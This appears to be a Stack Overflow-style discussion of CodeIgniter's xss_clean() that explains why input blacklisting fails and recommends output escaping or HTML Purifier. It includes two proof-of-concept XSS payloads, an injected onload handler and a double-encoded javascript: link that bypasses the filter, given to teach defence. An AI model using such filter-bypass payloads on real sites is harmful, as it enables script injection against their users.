CodeIgniter - why use xss_clean
xss_clean() is extensive, and also silly. 90% of this function does nothing to prevent XSS. Such as looking for the word alert
but not document.cookie
. No hacker is going to use alert
in their exploit, they are going to hijack the cookie with XSS or read a CSRF token to make an XHR.
However running htmlentities()
or htmlspecialchars()
with it is redundant. A case where xss_clean()
fixes the issue and htmlentities($text, ENT_COMPAT, 'UTF-8')
fails is the following:
<?php
print "<img src='$var'>";
?>
A simple poc is:
http://localhost/xss.php?var=http://domain/some_image.gif'%20onload=alert(/xss/)
This will add the onload=
event handler to the image tag. A method of stopping this form of XSS is htmlspecialchars($var,ENT_QUOTES);
or in this case xss_clean()
will also prevent this.
However, quoting from the xss_clean() documentation:
Nothing is ever 100% foolproof, of course, but I haven't been able to get anything passed the filter.
That being said, XSS is an output problem
not an input problem
. For instance, this function cannot take into account that the variable is already within a <script>
tag or event handler. It also doesn't stop DOM Based XSS. You need to take into consideration how you are using the data in order to use the best function. Filtering all data on input is a bad practice. Not only is it insecure but it also corrupts data which can make comparisons difficult.
I would recommend using http://htmlpurifier.org/ for doing XSS purification. I'm working on extending my CodeIgniter Input class to start leveraging it.
In your case, "stricter methods are fine, and lighter-weight". CodeIgniter developers intend xss_clean() for a different use case, "a commenting system or forum that allows 'safe' HTML tags". This isn't clear from the documentation, where xss_clean is shown applied to a username field.
There's another reason to never use xss_clean(), that hasn't been highlighted on StackOverflow so far. xss_clean() was broken during 2011 and 2012, and it's impossible to fix completely. At least without a complete redesign, which didn't happen. At the moment, it's still vulnerable to strings like this:
<a href="j&#x41;vascript:alert%252831337%2529">Hello</a>
The current implementation of xss_clean() starts by effectively applying urldecode() and html_entity_decode() to the entire string. This is needed so it can use a naive check for things like "javascript:". In the end, it returns the decoded string.
An attacker can simply encode their exploit twice. It will be decoded once by xss_clean(), and passed as clean. You then have a singly-encoded exploit, ready for execution in the browser.
I call these checks "naive" and unfixable because they're largely reliant on regular expressions. HTML is not a regular language. You need a more powerful parser to match the one in the browser; xss_clean() doesn't have anything like that. Maybe it's possible to whitelist a subset of HTML, which lexes cleanly with regular expressions. However, the current xss_clean() is very much a blacklist.